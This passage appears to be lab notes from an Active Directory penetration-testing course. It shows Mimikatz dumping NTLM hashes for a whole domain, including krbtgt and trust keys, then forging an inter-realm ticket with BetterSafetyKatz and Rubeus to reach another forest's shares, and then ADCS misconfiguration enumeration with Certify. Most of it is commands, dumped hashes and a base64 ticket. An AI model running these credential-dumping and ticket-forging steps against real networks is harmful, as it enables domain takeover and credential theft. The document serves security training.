* aes256_hmac cfd028f8bb22b9b250b0c2b8dc8a76a492f40947d5912c55d34e333c29893729
* aes128_hmac cf41ee77f4dc7e04cd59fb54f4b06a90
* rc4_hmac_nt 10b5b23f42f792c66e2277be14f4b55d

lsadump::lsa /patch
[dcorp-dc.dollarcorp.moneycorp.local]: PS C:\Users\svcadmin\Documents> Invoke-Mimi -Command
'"lsadump::lsa /patch"'

.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 18:36:14

.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(powershell) # lsadump::lsa /patch

Domain : dcorp / S-1-5-21-719815819-3726368948-3917688648

RID : 000001f4 (500)

User : Administrator
LM :
NTLM : af0686cc0ca8f04df42210c9ac980760

RID : 000001f5 (501)

User : Guest
LM :
NTLM :

RID : 000001f6 (502)

User : krbtgt
LM :
NTLM : 4e9815869d2090ccfca61c1fe0d23986

RID : 00000459 (1113)

User : sqladmin
LM :
NTLM : 07e8be316e3da9a042a9cb681df19bf5

RID : 0000045a (1114)

User : websvc
LM :
NTLM : cc098f204c5887eaa8253e7c2749156f

RID : 0000045b (1115)

User : srvadmin
LM :
NTLM : a98e18228819e8eec3dfa33cb68b0728

RID : 0000045d (1117)

User : appadmin
LM :
NTLM : d549831a955fee51a43c83efb3928fa7

RID : 0000045e (1118)

User : svcadmin
LM :
NTLM : b38ff50264b74508085d82c69794a4d8

RID : 0000045f (1119)

User : testda
LM :
NTLM : a16452f790729fa34e8f3a08f234a82c

RID : 00000460 (1120)

User : mgmtadmin
LM :
NTLM : 95e2cd7ff77379e34c6e46265e75d754

RID : 00000461 (1121)

User : ciadmin
LM :
NTLM : e08253add90dccf1a208523d02998c3d

RID : 00000462 (1122)

User : sql1admin
LM :
NTLM : e999ae4bd06932620a1e78d2112138c6
RID : 00001055 (4181)
User : studentadmin
LM :
NTLM : d1254f303421d3cdbdc4c73a5bce0201

RID : 00003521 (13601)

User : student161
LM :
NTLM : 12fe951ecdce0ee2edd5a4d71a0d6e0b

RID : 00003522 (13602)

User : student162
LM :
NTLM : 2230beda3bcd55b72cc4c1a5ef8170e9

RID : 00003523 (13603)

User : student163
LM :
NTLM : ccbca8c20310dbc0c5c9dcf1fde108b8

RID : 00003524 (13604)

User : student164
LM :
NTLM : 55e3baaf40c19d73f46b601d3cbfd41b

RID : 00003525 (13605)

User : student165
LM :
NTLM : a42ea87cc59018a3b49ec5d9be31a646

RID : 00003526 (13606)

User : student166
LM :
NTLM : 24b141d31352ea4f12745579e4885756

RID : 00003527 (13607)

User : student167
LM :
NTLM : 5ea118645828dcab565bf5895ca4ea57

RID : 00003528 (13608)

User : student168
LM :
NTLM : 53171b516f11d8b38e9fb0572014ba55

RID : 00003529 (13609)

User : student169
LM :
NTLM : 5a231022659299b4a1f2d1651d1c5106

RID : 0000352a (13610)

User : student170
LM :
NTLM : 9b0a73646f1fab4f0321f4526f3ed8f1

RID : 0000352b (13611)

User : student171
LM :
NTLM : 83c26fe5a55558897267fdf9a0d91d0d
RID : 0000352c (13612)
User : student172
LM :
NTLM : 1c0175bcef53648c75a88d566d2df3da

RID : 0000352d (13613)

User : student173
LM :
NTLM : de2a9206f558dddf3ded7b5f3427182c

RID : 0000352e (13614)

User : student174
LM :
NTLM : 6c22f89d3c33d5d260f195be679212b3

RID : 0000352f (13615)

User : student175
LM :
NTLM : 2c102014852ffa9959434ac02dc0fecd

RID : 00003530 (13616)

User : student176
LM :
NTLM : a8918ce94dcd39974537493be3a4895c

RID : 00003531 (13617)

User : student177
LM :
NTLM : d348e38df9c4883b5f234d83deb038f3

RID : 00003532 (13618)

User : student178
LM :
NTLM : cc4f8e304a59ed00c47a87d42b7c107f

RID : 00003533 (13619)

User : student179
LM :
NTLM : 667598cfb79b5ca955c70afba1606ee2

RID : 00003534 (13620)

User : student180
LM :
NTLM : 2e893c9e2619ca18f0560e732c573eb9

RID : 00003535 (13621)

User : Control161user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003536 (13622)

User : Control162user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003537 (13623)

User : Control163user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003538 (13624)

User : Control164user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003539 (13625)

User : Control165user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 0000353a (13626)

User : Control166user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 0000353b (13627)

User : Control167user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 0000353c (13628)

User : Control168user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 0000353d (13629)

User : Control169user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 0000353e (13630)

User : Control170user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 0000353f (13631)

User : Control171user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003540 (13632)

User : Control172user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003541 (13633)

User : Control173user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003542 (13634)

User : Control174user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003543 (13635)

User : Control175user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003544 (13636)

User : Control176user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003545 (13637)

User : Control177user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003546 (13638)

User : Control178user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003547 (13639)

User : Control179user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003548 (13640)

User : Control180user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003549 (13641)

User : Support161user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 0000354a (13642)

User : Support162user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 0000354b (13643)

User : Support163user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 0000354c (13644)

User : Support164user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 0000354d (13645)

User : Support165user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 0000354e (13646)

User : Support166user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 0000354f (13647)

User : Support167user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 00003550 (13648)

User : Support168user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 00003551 (13649)

User : Support169user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 00003552 (13650)

User : Support170user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 00003553 (13651)

User : Support171user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 00003554 (13652)

User : Support172user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 00003555 (13653)

User : Support173user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 00003556 (13654)

User : Support174user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 00003557 (13655)

User : Support175user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 00003558 (13656)

User : Support176user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 00003559 (13657)

User : Support177user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 0000355a (13658)

User : Support178user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7
RID : 0000355b (13659)
User : Support179user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 0000355c (13660)

User : Support180user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 0000355d (13661)

User : VPN161user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 0000355e (13662)

User : VPN162user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 0000355f (13663)

User : VPN163user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 00003560 (13664)

User : VPN164user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 00003561 (13665)

User : VPN165user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 00003562 (13666)

User : VPN166user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 00003563 (13667)

User : VPN167user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 00003564 (13668)

User : VPN168user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 00003565 (13669)

User : VPN169user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 00003566 (13670)

User : VPN170user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881
RID : 00003567 (13671)
User : VPN171user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 00003568 (13672)

User : VPN172user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 00003569 (13673)

User : VPN173user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 0000356a (13674)

User : VPN174user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 0000356b (13675)

User : VPN175user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 0000356c (13676)

User : VPN176user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 0000356d (13677)

User : VPN177user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 0000356e (13678)

User : VPN178user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 0000356f (13679)

User : VPN179user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 00003570 (13680)

User : VPN180user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 000003e8 (1000)

User : DCORP-DC$
LM :
NTLM : 81a9ccc2f44b988af78448ad78297ad5

RID : 00000451 (1105)

User : DCORP-ADMINSRV$
LM :
NTLM : b5f451985fd34d58d5120816d31b5565

RID : 00000452 (1106)

User : DCORP-APPSRV$
LM :
NTLM : b4cb7bf8b93c78b8051c7906bb054dc5

RID : 00000453 (1107)

User : DCORP-CI$
LM :
NTLM : f76f48c176dc09cfd5765843c32809f3

RID : 00000454 (1108)

User : DCORP-MGMT$
LM :
NTLM : 0878da540f45b31b974f73312c18e754

RID : 00000455 (1109)

User : DCORP-MSSQL$
LM :
NTLM : b205f1ca05bedace801893d6aa5aca27

RID : 00000456 (1110)

User : DCORP-SQL1$
LM :
NTLM : 3686dfb420dc0f9635e70c6ca5875b49

RID : 0000106a (4202)

User : DCORP-STDADMIN$
LM :
NTLM : 323e49189b1edbea4a323142017328cb

RID : 00003571 (13681)

User : DCORP-STD161$
LM :
NTLM : 9ef9daa7b4bc99ab3e4121f2abd037c7

RID : 00003572 (13682)

User : DCORP-STD162$
LM :
NTLM : 36cc733a53e75d0cbd53e0fe7731e716

RID : 00003573 (13683)

User : DCORP-STD163$
LM :
NTLM : 75e1e5ec9a9f15290d40cd1b04fede35

RID : 00003574 (13684)

User : DCORP-STD164$
LM :
NTLM : 34575ea235cdfb2fad121301f59a4a2d

RID : 00003575 (13685)

User : DCORP-STD165$
LM :
NTLM : 565d99510bbbe8fb3e4fa5c9c2120bc5

RID : 00003576 (13686)

User : DCORP-STD166$
LM :
NTLM : 1ab7d20a96b7b4b34e0c806b7631ad8e

RID : 00003577 (13687)

User : DCORP-STD168$
LM :
NTLM : 313fc2c203e17c1a63554c88e090c205

RID : 00003578 (13688)

User : DCORP-STD167$
LM :
NTLM : 69a450cb407f22862f946f22d20db2c2

RID : 00003579 (13689)

User : DCORP-STD169$
LM :
NTLM : ceeab9f5c7798eb9034512934ec115a8

RID : 0000357a (13690)

User : DCORP-STD170$
LM :
NTLM : 1d24dfc4057c69f71576c0cc1e862a17

RID : 0000357b (13691)

User : DCORP-STD171$
LM :
NTLM : 84d9394ef97f221290f257059e8086d0

RID : 0000357c (13692)

User : DCORP-STD172$
LM :
NTLM : 49cc46d9ea5e322232497c21f808ff88

RID : 0000357d (13693)

User : DCORP-STD173$
LM :
NTLM : b94c3a7d1f129098c1b7968b5db44807

RID : 0000357e (13694)

User : DCORP-STD174$
LM :
NTLM : b642781c290b8550a2e9b2661cf87654

RID : 0000357f (13695)

User : DCORP-STD175$
LM :
NTLM : 57f3d186ece9047624b82015fab8d00e

RID : 00003580 (13696)

User : DCORP-STD176$
LM :
NTLM : 79207f3a25b685aa97ea1b34aef53fef

RID : 00003581 (13697)

User : DCORP-STD177$
LM :
NTLM : 2979ebc70dd459e65f8ac3e998aed6b1

RID : 00003582 (13698)

User : DCORP-STD178$
LM :
NTLM : 956164515f0459ea114452437d5ea4d7

RID : 00003583 (13699)

User : DCORP-STD180$
LM :
NTLM : 459c493625fe5994ff309debff15f163

RID : 00003584 (13700)

User : DCORP-STD179$
LM :
NTLM : c9b2183c974b57b61d873026a4443688

RID : 0000044f (1103)

User : mcorp$
LM :
NTLM : a8f73b279dc7257c7a8a2d0c911043d2

RID : 00000450 (1104)

User : US$
LM :
NTLM : b6180443e64c3dd466720bd52d6e34c8

RID : 00000458 (1112)

User : ecorp$
LM :
NTLM : feddedccad840cd0e5c912cb1f860b35

Forging Inter-Realm TGT

With the help of the trust key obtained we forge an inter-realm TGT. For inter-forest trust we don’t have
to inject SIDs since SIDs would be filtered out.
C:\Windows\system32>C:\AD\Tools\Old_tools\BetterSafetyKatz.exe "kerberos::golden
/user:administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-
3917688648 /rc4:feddedccad840cd0e5c912cb1f860b35 /service:krbtgt /target:eurocorp.local
/ticket:C:\Users\student163\Desktop\shared\trustticket_Forest.kirbi" "exit"
[+] Stolen from @harmj0y, @TheRealWover, @cobbr_io and @gentilkiwi, repurposed by @Flangvik and
@Mrtn9
[+] Randomizing strings in memory
[+] Suicide burn before CreateThread!

.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51

.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # kerberos::golden /user:administrator /domain:dollarcorp.moneycorp.local

/sid:S-1-5-21-719815819-3726368948-3917688648 /rc4:feddedccad840cd0e5c912cb1f860b35
/service:krbtgt /target:eurocorp.local
/ticket:C:\Users\student163\Desktop\shared\trustticket_Forest.kirbi
User : administrator
Domain : dollarcorp.moneycorp.local (DOLLARCORP)
SID : S-1-5-21-719815819-3726368948-3917688648
User Id : 500
Groups Id : *513 512 520 518 519
ServiceKey: feddedccad840cd0e5c912cb1f860b35 - rc4_hmac_nt
Service : krbtgt
Target : eurocorp.local
Lifetime : 7/5/2024 1:27:54 AM ; 7/3/2034 1:27:54 AM ; 7/3/2034 1:27:54 AM
-> Ticket : C:\Users\student163\Desktop\shared\trustticket_Forest.kirbi

* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated

Final Ticket Saved to file !

mimikatz(commandline) # exit
Bye!

C:\Windows\system32>C:\Ad\Tools\Rubeus.exe asktgs
/ticket:"C:\Users\student163\Desktop\shared\trustticket_forest.kirbi" /service:cifs/eurocorp-
dc.eurocorp.local /dc:eurocorp-dc.eurocorp.local /ptt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: Ask TGS

[*] Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket
[*] Building TGS-REQ request for: 'cifs/eurocorp-dc.eurocorp.local'
[*] Using domain controller: eurocorp-dc.eurocorp.local (172.16.15.1)
[+] TGS request successful!
[+] Ticket successfully imported!
[*] base64(ticket.kirbi):

doIFjjCCBYqgAwIBBaEDAgEWooIEcDCCBGxhggRoMIIEZKADAgEFoRAbDkVVUk9DT1JQLkxPQ0FMoi0w
K6ADAgECoSQwIhsEY2lmcxsaZXVyb2NvcnAtZGMuZXVyb2NvcnAubG9jYWyjggQaMIIEFqADAgESoQMC
AQ2iggQIBIIEBHEjvdqz5K3g72AvIT30kHG6jCBUoasNTBthnbmL4tV/bGtrmLCz3gK9HjVVau6nmCRD
ol69q2skbQo0TWs2cegJEDOu9fRxyx+8LaljOURCl7olWUzg67QplByDggUzWmtHXdXyoYbo1d+b0GXW
ejtbJOjmhOrQeBNjk0ppSV0i2ysH2Lx50r1McyZraDiY0RCjcLvoDEBMvwWb5yfA9MJl7ICYikyxo3ze
2Mrf4YaG85y8gxauLyhaNznxXOanyRrbzMp6GY7nLR2dAK5KzBsCHcvSCEmek1Ko39zZWExbu8lZmAZ3
kRzkNaKuA0N+/qWRKYAOzmhFne/6m8ZSoc/pRUqPOvMBbnavoAWuWzTPDa+CGpwGb8d5pG+s6UHv+ha6
wd3Yi0zomjNpvH/Kb1sKdRyySqCYfBTkv2AQwu6SfIhxenkukGaXXzqihT2pipnDmbTloh11xDo//Q0L
/CfBeEyoyusXuEp7yfkm6LpUUs6ZV9pQXhv8UAbZjw4ySmWmDVmWbiA+U0U/oqIqk8HxFwC7uQXyADoR
9IyzQvjPa8H95t6/nUSZiNmb4fUWZ/YYogajNK3ZTS2R5Y/zPD7hgqY7Tf0zIwUICxKN5uIZsg6xyByj
to2MSkITGO3DQJNufR7Im2eeQ+yi7L+fN+lZ/ZBh3YZFzbzRBKUckya1y6C2iwFuPQ1gmX9QSTOV9b1O
vzs3BtTpARPP9HBjwuL/0b5lmlN9Ug+3aW9S/8lstiu1Ke7NUv2ATYqaF8Cf2fe7GkPYmHPwsA5a7Oo0
hh2HNGVbIT9wLfOwDOYU3K8lPl2Edz/00w87EoB6ajkiMHHrVxmR+tIQK2qBChHWH/R5bVPoMH1Yx4y3
2qTwWW/h+/UZ329TyKX+1Hoe9Nx7fIH6RLu7NBO5J0Oy7l/ftJLcvYxpLmfPh9y7okjsdyQuoWsayCCG
6LVTF266W/6hg1itHzTbVf7p0RwCV6oY35YUiJS1+HuhYCgHrhWeusa4/bnGzPglwImv4xUc6MQzUWbm
sGXtwkGOsOZFvHFwxrkrEGDb0jsjWKdQNdoHl3IO6t8kHU4cA96i6lWX76stghR4LRO8tWVyF+JlLkNd
SJB/Ccc89wU27QuJ2dIlHb6XkIR/7ww45KoVSsBpkYCRbJQeWWJhSxIpLit/EbIfZH6lrkvXqVyw/VcV
x/769MVWFpX8mgHDJqYKrz2VMAuTVPvYbAOewUAvEsYKGU3+IF+hlLyWx2UW499bVFZ5Hs0tInMeYjjZ
zQJLyupJ/PTMc9ZRXAGNxWPfw1rkQXLhmZOrSVkfTI7lVvUnBIYNA3jCKZ5TGw6o9P/vydFL6AgOU46Z
 MSc/k2DizriFt5Dh2F7QKqPpo4IBCDCCAQSgAwIBAKKB/ASB+X2B9jCB86CB8DCB7TCB6qArMCmgAwIB
EqEiBCDISP+KKKlkdzIUX3Omg8qOW/ifKJpPXupWXctuebtR3qEcGxpkb2xsYXJjb3JwLm1vbmV5Y29y
cC5sb2NhbKIaMBigAwIBAaERMA8bDWFkbWluaXN0cmF0b3KjBwMFAEClAAClERgPMjAyNDA3MDUwODI4
NDJaphEYDzIwMjQwNzA1MTgyODQyWqcRGA8yMDI0MDcxMjA4Mjg0MlqoEBsORVVST0NPUlAuTE9DQUyp
LTAroAMCAQKhJDAiGwRjaWZzGxpldXJvY29ycC1kYy5ldXJvY29ycC5sb2NhbA==

ServiceName : cifs/eurocorp-dc.eurocorp.local
ServiceRealm : EUROCORP.LOCAL
UserName : administrator
UserRealm : dollarcorp.moneycorp.local
StartTime : 7/5/2024 1:28:42 AM
EndTime : 7/5/2024 11:28:42 AM
RenewTill : 7/12/2024 1:28:42 AM
Flags : name_canonicalize, ok_as_delegate, pre_authent, renewable,
forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : yEj/iiipZHcyFF9zpoPKjlv4nyiaT17qVl3Lbnm7Ud4=

C:\Windows\system32>klist

Current LogonId is 0:0x16159e5

Cached Tickets: (1)

#0> Client: administrator @ dollarcorp.moneycorp.local

Server: cifs/eurocorp-dc.eurocorp.local @ EUROCORP.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate
name_canonicalize
Start Time: 7/5/2024 1:28:42 (local)
End Time: 7/5/2024 11:28:42 (local)
Renew Time: 7/12/2024 1:28:42 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called:

We can only access the resources of the domain eurocorp.local which are explicitly shared with domain
dcorp-dollarcorp.moneycorp.local. We need to enumerate if there are any resources accessible from the
other forest to the users in present forest. For enumerating file shares we can use the net view command.
C:\Windows\system32>net view \\eurocorp-dc.eurocorp.local
Shared resources at \\eurocorp-dc.eurocorp.local

Share name Type Used as Comment

-------------------------------------------------------------------------------
NETLOGON Disk Logon server share
SharedwithDCorp Disk
SYSVOL Disk Logon server share
The command completed successfully.
C:\Windows\system32>dir \\eurocorp-dc.eurocorp.local\SharedwithDcorp
Volume in drive \\eurocorp-dc.eurocorp.local\SharedwithDcorp has no label.
Volume Serial Number is 1A5A-FDE2
 Directory of \\eurocorp-dc.eurocorp.local\SharedwithDcorp

11/16/2022 05:26 AM <DIR> .

11/15/2022 07:17 AM 29 secret.txt
1 File(s) 29 bytes
1 Dir(s) 12,814,331,904 bytes free
ADCS abuse
Components of ADCS
CA - The certification authority that issues certificates. The server with the role ADCS is the CA.

Certificate - Issues to an user or a machine and can be used for authentication, signing, encryption etc.

CSR - Certificate signing request made by a client to the CA to request a certificate.

Certificate Template - Defines settings for a certificate. Contains information like enrollment permissions,
EKUs, expiry etc.

EKU OIDs - Extended Key Usage Object identifiers. These dictate the use of the certificate templates.
(Client Authentication, Smartcard logon, SubCA etc)

Enumerating ADCS
Enumeration can be done using certify.exe.

certify.exe cas → This command will enumerate the ADCS in the target forest.
C:\Windows\system32>"C:\AD\Tools\Certify.exe" cas

_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.0.0

[*] Action: Find certificate authorities

[*] Using the search base 'CN=Configuration,DC=moneycorp,DC=local'

[*] Root CAs

Cert SubjectName : CN=moneycorp-MCORP-DC-CA, DC=moneycorp, DC=local

Cert Thumbprint : 8DA9C3EF73450A29BEB2C77177A5B02D912F7EA8
Cert Serial : 48D51C5ED50124AF43DB7A448BF68C49
Cert Start Date : 11/26/2022 1:59:16 AM
Cert End Date : 11/26/2032 2:09:15 AM
Cert Chain : CN=moneycorp-MCORP-DC-CA,DC=moneycorp,DC=local

[*] NTAuthCertificates - Certificates that enable authentication:

Cert SubjectName : CN=moneycorp-MCORP-DC-CA, DC=moneycorp, DC=local

Cert Thumbprint : 8DA9C3EF73450A29BEB2C77177A5B02D912F7EA8
Cert Serial : 48D51C5ED50124AF43DB7A448BF68C49
Cert Start Date : 11/26/2022 1:59:16 AM
Cert End Date : 11/26/2032 2:09:15 AM
 Cert Chain : CN=moneycorp-MCORP-DC-CA,DC=moneycorp,DC=local

[*] Enterprise/Enrollment CAs:

Enterprise CA Name : moneycorp-MCORP-DC-CA

DNS Hostname : mcorp-dc.moneycorp.local
FullName : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Flags : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
Cert SubjectName : CN=moneycorp-MCORP-DC-CA, DC=moneycorp, DC=local
Cert Thumbprint : 8DA9C3EF73450A29BEB2C77177A5B02D912F7EA8
Cert Serial : 48D51C5ED50124AF43DB7A448BF68C49
Cert Start Date : 11/26/2022 1:59:16 AM
Cert End Date : 11/26/2032 2:09:15 AM
Cert Chain : CN=moneycorp-MCORP-DC-CA,DC=moneycorp,DC=local
[!] UserSpecifiedSAN : EDITF_ATTRIBUTESUBJECTALTNAME2 set, enrollees can specify Subject
Alternative Names!
CA Permissions :
Owner: BUILTIN\Administrators S-1-5-32-544

Access Rights Principal

Allow Enroll NT AUTHORITY\Authenticated UsersS-1-5-11

Allow ManageCA, ManageCertificates BUILTIN\Administrators S-1-5-32-
544
Allow ManageCA, ManageCertificates mcorp\Domain Admins S-1-5-21-
335606122-960912869-3279953914-512
Allow ManageCA, ManageCertificates mcorp\Enterprise Admins S-1-5-21-
335606122-960912869-3279953914-519
Enrollment Agent Restrictions : None

Enabled Certificate Templates:

CA-Integration
HTTPSCertificates
SmartCardEnrollment-Agent
SmartCardEnrollment-Users
DirectoryEmailReplication
DomainControllerAuthentication
KerberosAuthentication
EFSRecovery
EFS
DomainController
WebServer
Machine
User
SubCA
Administrator

Certify completed in 00:00:38.4951036

certify.exe find → Enumerate the certificate templates

certify.exe find /vulnerable → Enumerate the vulnerable templates

Common misconfigurations for Domain Privilege escalation path
• CA grants normal/ low privileged users enrollment rights

• Manager approval is disabled

• Authorization signatures are not required

• The target template grants normal / low privileged users enrollment rights.

Enrollee can enroll certificate for any user

One common misconfiguration in Active Directory Certificate Services (AD CS) is allowing the "Enrollee
can enroll certificate for any user" setting. Ideally, users should only be able to request certificates for
themselves. However, if a certificate template is configured to allow the enrollee to supply the subject,
this misconfiguration can enable users to request certificates on behalf of any user, including high-
privilege accounts like Domain Admins or Enterprise Admins.

Explanation of the Misconfiguration

1. Certificate Template Setting:

o The certificate template has a setting that allows the enrollee to supply the subject.

o This means that when a user requests a certificate, they can specify the subject name (the
name of the user for whom the certificate is being requested).

2. Potential Abuse:

o If this setting is enabled, a user with access to this certificate template can request a
certificate for any user in the domain.

o This includes high-privilege users like Domain Admins or Enterprise Admins.

o The requested certificate can then be used to authenticate as the specified user.

3. Security Risk:

o This misconfiguration poses a significant security risk as it allows an attacker to

impersonate high-privilege accounts.

o The attacker can use the obtained certificate to request a Ticket Granting Ticket (TGT)
from the Kerberos Key Distribution Center (KDC), effectively gaining the same privileges
as the impersonated user.
C:\Windows\system32>C:\AD\Tools\certify.exe find /enrolleesuppliessubject

_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
 |___./
v1.0.0

[*] Action: Find certificate templates

[*] Using the search base 'CN=Configuration,DC=moneycorp,DC=local'

[*] Listing info about the Enterprise CA 'moneycorp-MCORP-DC-CA'

Enterprise CA Name : moneycorp-MCORP-DC-CA

DNS Hostname : mcorp-dc.moneycorp.local
FullName : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Flags : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
Cert SubjectName : CN=moneycorp-MCORP-DC-CA, DC=moneycorp, DC=local
Cert Thumbprint : 8DA9C3EF73450A29BEB2C77177A5B02D912F7EA8
Cert Serial : 48D51C5ED50124AF43DB7A448BF68C49
Cert Start Date : 11/26/2022 1:59:16 AM
Cert End Date : 11/26/2032 2:09:15 AM
Cert Chain : CN=moneycorp-MCORP-DC-CA,DC=moneycorp,DC=local
[!] UserSpecifiedSAN : EDITF_ATTRIBUTESUBJECTALTNAME2 set, enrollees can specify Subject
Alternative Names!
CA Permissions :
Owner: BUILTIN\Administrators S-1-5-32-544

Access Rights Principal

Allow Enroll NT AUTHORITY\Authenticated UsersS-1-5-11

Allow ManageCA, ManageCertificates BUILTIN\Administrators S-1-5-32-
544
Allow ManageCA, ManageCertificates mcorp\Domain Admins S-1-5-21-
335606122-960912869-3279953914-512
Allow ManageCA, ManageCertificates mcorp\Enterprise Admins S-1-5-21-
335606122-960912869-3279953914-519
Enrollment Agent Restrictions : None

[*] Available Certificates Templates :

CA Name : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Template Name : User
Schema Version : 1
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificates-Name-Flag : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_ALT_REQUIRE_EMAIL,
SUBJECT_REQUIRE_EMAIL, SUBJECT_REQUIRE_DIRECTORY_PATH
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS,
